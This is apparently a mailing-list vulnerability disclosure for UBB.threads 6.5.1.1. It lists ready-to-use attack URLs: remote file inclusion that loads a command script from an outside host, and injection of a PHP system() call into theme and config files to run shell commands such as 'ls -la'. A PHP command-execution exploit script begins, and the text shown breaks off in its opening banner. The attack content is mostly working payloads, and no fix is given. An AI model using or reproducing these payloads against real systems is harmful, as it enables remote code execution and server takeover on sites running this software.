|
Hello,,=0D
=0D
UBB.threads Multiple input validation error=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D
Email Address : security@soqor.net=0D
=0D
Tested on Version 6 (6.5.1.1) and other versions maybe affected=0D
=0D
=0D
Remote File including :=0D
ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir=0D
ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir=0D
-------------------------------------------------------=0D
Files overwrite vulnerabilities=0D
if magic_qoutes_gpc = off=0D
=0D
admin/doedittheme.php?theme[soqor]=".system($_GET[cmd])."&thispath=../=0D
and open =0D
includes/theme.inc.php?cmd=ls -la=0D
or :-=0D
admin/doeditconfig.php?config[soqor]=".system($_GET[cmd])."&thispath=../=0D
and open=0D
includes/config.inc.php?cmd=ls -la=0D
=0D
-- # -- # -- # --=0D
=0D
if magic_qoutes_gpc = on=0D
admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt?=0D
=0D
and you will have a command execution files ..=0D
example=0D
dorateuser.php?cmd=ls -la=0D
calendar.php?cmd=ls -la=0D
and so many other files which includes using this variable ($config[path])=0D
-------------------------------------------------------=0D
=0D
Full path=0D
cron/php/subscriptions.php=0D
=0D
-------------------------------------------------------=0D
Exploit :-=0D
=0D
#!/usr/bin/php -q -d short_open_tag=on=0D
=0D
/*=0D
/* UBB.threads Multiple vulnerabilities=0D
/* This exploit should allow you to execute commands=0D
/* By : HACKERS PAL=0D
/* WwW.SoQoR.NeT=0D
*/=0D
print_r('=0D
/**********************************************/=0D
/* UBB.threads Command Execution */=0D
/* by HACKERS PAL